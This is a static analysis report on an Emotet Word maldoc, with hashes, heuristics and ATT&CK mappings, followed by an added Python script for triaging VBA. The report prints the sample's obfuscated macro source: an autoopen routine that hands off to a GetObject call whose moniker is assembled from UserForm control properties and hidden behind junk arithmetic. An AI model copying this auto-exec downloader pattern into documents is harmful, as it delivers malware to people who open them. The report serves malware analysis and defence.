Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 3c0a8897217f08f9…

MALICIOUS

Office (OLE)

Size: 184.9 KB
Created: 2019-03-29 07:33:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 8fc202c4277ead539f93f951fa3fa6a9
SHA-1: ec2d7cad789c685e9543050e886df493157cbabe
SHA-256: 3c0a8897217f08f931054d45798d6d7450a3fcb854016c34469df3bbf8328c73
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File
  • T1059.005 Command and Scripting Interpreter: Visual Basic

ClamAV flags the file with the signature Doc.Downloader.Emotet-6916023-0, which points to the Emotet family (the family verdict above carries 95% confidence). The VBA project contains an autoopen Sub that does nothing but call a second function, dX1AxA, whose only meaningful statement is a GetObject call. The argument to GetObject is assembled at run time by concatenating properties of UserForm controls (WAQGQ_A.oDA4Ao4.ControlSource, YxAAAAA.lDwBAB4 and WAQGQ_A.oDA4Ao4.ControlTipText), so the moniker string actually handed to GetObject is not visible in the macro source and has to be recovered from the form streams. This is the stage-one pattern of an Emotet maldoc: the macro's job is to fetch and run a second-stage payload, and everything else in the module (dead If blocks comparing undeclared variables, junk arithmetic wrapped in On Error Resume Next) is padding that varies between samples. The only extracted URL, http://schemas.openxmlformats.org/drawingml/2006/main, is an OOXML schema namespace that appears in ordinary Word documents; it is benign and is not a download location, so it should not be added to an indicator list.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6916023-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware with the signature Doc.Downloader.Emotet-6916023-0.
  • VBA macros detected [medium, OLE_VBA_MACROS; 3 related findings]
    The document contains VBA macro code.
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened (subject to the user's macro settings).
  • GetObject call [high, OLE_VBA_GETOBJ]
    The macro calls GetObject, which returns a reference to a COM/ActiveX object named by a path or moniker string; with a string built at run time this is a common way to launch a payload without a literal Shell or CreateObject in the source.
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule catches p-code-only documents and documents whose source extraction failed, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule is meant for the case where no modern VBA project is recovered and no stronger macro-virus family marker is present; it is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was recovered (see Extracted artifacts), so the marker duplicates the AutoOpen finding rather than adding to it.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26170 bytes
SHA-256: a2dbd1a2ba231d1ae29331a76e4f44c5ee86c69b078ec31c6a9e4b038bae1529

Script preview (first 1,000 lines of the extracted source; truncated below). The file concatenates four modules, each introduced by its Attribute VB_Name line: OABDAA4B (VB_Base = "1Normal.ThisDocument", the ThisDocument class), WAQGQ_A and YxAAAAA (VB_Base set to a pair of class GUIDs with VB_Exposed = False, the shape of a UserForm designer module, whose control property values live in form streams rather than in this source), and wAUkUkwC, the standard module that holds autoopen and the GetObject call:
Attribute VB_Name = "OABDAA4B"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WAQGQ_A"
Attribute VB_Base = "0{F78B3326-73C5-49FA-83B1-F914BD7BCED9}{76C56B2B-F667-46EB-A4CB-9CA2B2A26779}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "YxAAAAA"
Attribute VB_Base = "0{E8AB5339-ABEA-475F-967A-7478265F5E51}{2E746637-CF13-4006-B4BA-07560D47BAFC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAUkUkwC"
Function bAGQcZQ()
   If nkUAkDkB = dUBGGAG Then
Set WDDwZA = Y4wAZACU
kxCBCwAU = tADAB_U - 793041893 - 678518978 + Log(912702890 - Atn(r_AcGoD / OoACwAB + ODxAxxwA / Tan(892972071))) * (9805233 + Sgn(844868100 / Sin(tQkXZAcB)))
Set cA4BAUA = iAABQDA
End If
   If YAxAA4wo = vQX_4_D Then
Set wAAUCABo = BkABAABD
tAAAC4CX = oA1oADU - 623682577 - 88326582 + Log(187652900 - Atn(jcZQAcBG / zDAAAA + ZAADkU / Tan(814735075))) * (765239317 + Sgn(288893129 / Sin(z1wAAA)))
Set WDcDA_GG = hA1oQU
End If
End Function
Function rkUZG44()
   If QBQA4ADD = iA4ZkG Then
Set jxCZAU = oA4XwD
toAQAB = cX_BXQAD - 499542368 - 430068787 + Log(833316797 - Atn(rAAAAAA_ / ZXA4wwAA + GCBACc / Tan(476432))) * (604807402 + Sgn(243641689 / Sin(NoAAD1AA)))
Set SQACUQ = HDZAZooC
End If
   If NUAkAUA = zBAQA_A Then
Set SDBAQADA = KoxAA_Dc
nooACCZD = wAQAAD - 991857155 - 123257249 + Log(915056874 - Atn(fB4wACBQ / XkGA__ZX + PwAU_kU / Tan(612874817))) * (561123561 + Sgn(467696617 / Sin(SDkA1B)))
Set w1DZQAk1 = YCDUAUQ
End If
   If bxCwoB = cxwBAQ Then
Set EDZAAGZx = fAAAZU
aDUAAcAc = nBGBZA - 407577260 - 715352754 + Log(505597967 - Atn(rQAGBcDA / sCcACA1 + EAAD1UA / Tan(38370891))) * (548844692 + Sgn(219063213 / Sin(tDAGBQkw)))
Set DkGooGQ = GUx_QBAA
End If
End Function
Sub autoopen()
dX1AxA
End Sub
Function dX1AxA()
On Error Resume Next
   If rABAk44 = NQC1ok Then
Set DAACQAA = OAAGXAG
BZUkUQw = VAkAA4 - 474084368 - 294512251 + Log(318978175 - Atn(DXAAGAo / DAAGUDA + RkAABAXA / Tan(647041776))) * (605079216 + Sgn(456131464 / Sin(iGAUBUQ_)))
Set WoxQAAw = aDcoUU4
End If
   If KwXAkA = ucAxoA Then
Set w4ZAAZ = voDCkx
lADDBQx = jXQAAA - 449876047 - 468306839 + Log(868991172 - Atn(LCxUZAA / uAoQx1A + jXBBABAX / Tan(123270619))) * (158819329 + Sgn(542486386 / Sin(N4UXQQU)))
Set SAAUQAA = OAUAXAG
End If
Set hU4w_A = GetObject(WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.lDwBAB4 + WAQGQ_A.oDA4Ao4.ControlTipText)
   If LGAAAAAx = SAAwcUAX Then
Set m14GBD = I1CUXUB
PUoAAA = zDwAADA - 464750075 - 53565047 + Log(955061135 - Atn(z4_AoB / i4DDAQQQ + zoUXox / Tan(818091502))) * (174085200 + Sgn(827388599 / Sin(MkACAAU)))
Set CCDABAcB = dADQxAGA
End If
   If WAAxAQ = tQAQAD Then
Set DcAcGAZD = EQAAAZkB
kCwABAZ = nCAAACB - 285121965 - 408145712 + Log(487130502 - Atn(PQUAQAkw / w1AXkAC + G4cUAADA / Tan(814222785))) * (731319692 + Sgn(217045064 / Sin(M4AABoD)))
Set kQDckD_ = Q1QUAAAZ
End If
   If mZAQAAD = T1GUQ_BA Then
Set vcAXBBww = qBQQAXAQ
DcAABG = QUxAXZU - 601914844 - 79381524 + Log(307534097 - Atn(DAAAXAZA / qxABAAA + HAGAAAc / Tan(380049161))) * (293734612 + Sgn(388563309 / Sin(RBBxAA)))
Set CXU_CA = R4_CGCAG
End If
If 244778 = 244778 Then
   If ToCAQAA = BBAX1B Then
Set EGUAXQAo = bQUUZA_
nGwBAoAG = VQUDAAQA - 784054506 - 167861156 + Log(93894239 - Atn(dUoGoADx / z4woAQo + AAQUBU / Tan(40677750))) * (464975096 + Sgn(742242790 / Sin(mAUoAA1w)))
Set cUUUA_k = UAocxAAc
End If
   If QkUZBc = kAXDXG Then
Set wcQAUw_Q = MDUoDA
GAw_AA = rAAwGAB - 983278805 - 892256856 + Log(834086417 - Atn(jkABAZ / TBDQZBBU + iAUAD1w / Tan(121687673))
... (truncated)
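The triage the summary describes by hand (find the auto-exec entry, follow it to dX1AxA, ignore the padding, read off what GetObject is fed) can be scripted. The following is an added example, not part of the report and not oletools' code: it runs on the decoded source text that olevba produces, so it can be reproduced offline. The embedded sample is a constructed excerpt of the macros.bas preview above (identifiers copied from it, the junk arithmetic abridged, not the full 26,170-byte file), and the function names triage, strip_junk and getobject_operands are ours. It deliberately stops at listing the three UserForm control properties: their values are stored in the form streams of the WAQGQ_A and YxAAAAA designer modules, which olevba reports as form strings and oletools' oleform module can parse, and only that data reveals the moniker GetObject receives.

```python
"""Added triage example, not the page's or oletools' code: locate the auto-exec entry in
extracted VBA, follow it to the payload function, strip the junk If/arithmetic padding, and
list the UserForm control properties concatenated into the GetObject() argument. Stdlib only."""
import re

# Constructed excerpt modelled on the page's macros.bas preview: identifiers copied from it,
# junk arithmetic abridged; this is not the full 26,170-byte file.
SAMPLE_VBA = r'''Attribute VB_Name = "wAUkUkwC"
Sub autoopen()
dX1AxA
End Sub
Function dX1AxA()
On Error Resume Next
   If rABAk44 = NQC1ok Then
Set DAACQAA = OAAGXAG
BZUkUQw = VAkAA4 - 474084368 - 294512251 + Log(318978175 - Atn(DXAAGAo / DAAGUDA))
Set WoxQAAw = aDcoUU4
End If
Set hU4w_A = GetObject(WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.lDwBAB4 + WAQGQ_A.oDA4Ao4.ControlTipText)
If 244778 = 244778 Then
   If LGAAAAAx = SAAwcUAX Then
Set m14GBD = I1CUXUB
End If
End If
End Function
'''

AUTOEXEC_NAMES = {"autoopen", "autoexec", "autoclose", "autonew", "document_open", "workbook_open"}
SUSPICIOUS = ("GetObject", "CreateObject", "Shell", "WScript", "Environ", "URLDownloadToFile", "XMLHTTP")
KEYWORD_RE = re.compile(r'\b(?:%s)\b' % "|".join(SUSPICIOUS), re.I)
PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(', re.I)
END_PROC_RE = re.compile(r'^\s*End\s+(?:Sub|Function)\s*$', re.I)
IF_RE = re.compile(r'^\s*If\s+(\S+)\s*=\s*(\S+)\s+Then\s*$', re.I)   # block-form "If a = b Then"
END_IF_RE = re.compile(r'^\s*End\s+If\s*$', re.I)
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?[A-Za-z_]\w*\s*=\s*.+$', re.I)
CALL_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*$')                       # bare name on a line = call
GETOBJ_RE = re.compile(r'\bGetObject\s*\((.*)\)\s*$', re.I)

def split_procedures(src):
    """Map procedure name -> list of stripped body lines (Attribute lines are skipped)."""
    procs, name, body = {}, None, []
    for line in src.splitlines():
        m = PROC_RE.match(line)
        if m and name is None:
            name, body = m.group(1), []
        elif name is not None and END_PROC_RE.match(line):
            procs[name], name = body, None
        elif name is not None:
            body.append(line.strip())
    return procs

def strip_junk(lines):
    """Drop If-blocks that only assign throwaway variables; unwrap constant-true tests."""
    out, i = [], 0
    while i < len(lines):
        m = IF_RE.match(lines[i])
        if not m:
            out.append(lines[i])
            i += 1
            continue
        depth, j = 1, i + 1                      # find the matching End If, nesting-aware
        while j < len(lines) and depth:
            depth += bool(IF_RE.match(lines[j])) - bool(END_IF_RE.match(lines[j]))
            j += 1
        body = strip_junk(lines[i + 1:j - 1] if depth == 0 else lines[i + 1:j])
        a, b = m.groups()
        if a.isdigit() and b.isdigit():          # constant condition: body survives only if true
            if a == b: out.extend(body)
        elif not all(ASSIGN_RE.match(l) and not KEYWORD_RE.search(l) for l in body):
            out += [lines[i], *body, "End If"]   # something real inside: keep the block
        i = j                                    # padding-only blocks fall through and vanish
    return out

def getobject_operands(lines):
    """Split the GetObject argument on '+' into (form_module, control, property) triples;
    property None means the control's default property is what gets read."""
    ops = []
    for line in lines:
        m = GETOBJ_RE.search(line)
        for term in ((t.strip() for t in m.group(1).split("+")) if m else ()):
            parts = term.split(".")
            if 2 <= len(parts) <= 3 and all(parts):
                ops.append((parts[0], parts[1], parts[2] if len(parts) == 3 else None))
            else:
                ops.append((term, None, None))   # literal or an expression we don't model
    return ops

def triage(src):
    """Auto-exec procs, the function they hand off to, its de-padded body, GetObject operands."""
    procs = split_procedures(src)
    autoexec = [n for n in procs if n.lower() in AUTOEXEC_NAMES]
    entry = autoexec[0] if autoexec else None
    for line in procs.get(entry, []):            # follow a bare-call hand-off
        m = CALL_RE.match(line)
        if m and m.group(1) in procs:
            entry = m.group(1)
            break
    cleaned = strip_junk(procs.get(entry, []))
    return {"autoexec": autoexec, "entry": entry, "deobfuscated": cleaned,
            "getobject_operands": getobject_operands(cleaned)}
```

Calling triage(SAMPLE_VBA) reduces dX1AxA to its On Error Resume Next line and the GetObject call, and returns the three (module, control, property) triples to resolve. The padding test is deliberately conservative: a block is discarded only when every statement in it is a plain assignment that mentions none of the execution keywords, so a real Shell or CreateObject hidden inside an opaque If survives. Note that in VBA two undeclared variables are both Empty and compare equal, so these blocks do execute; they are junk because nothing they assign is ever read, not because they are unreachable.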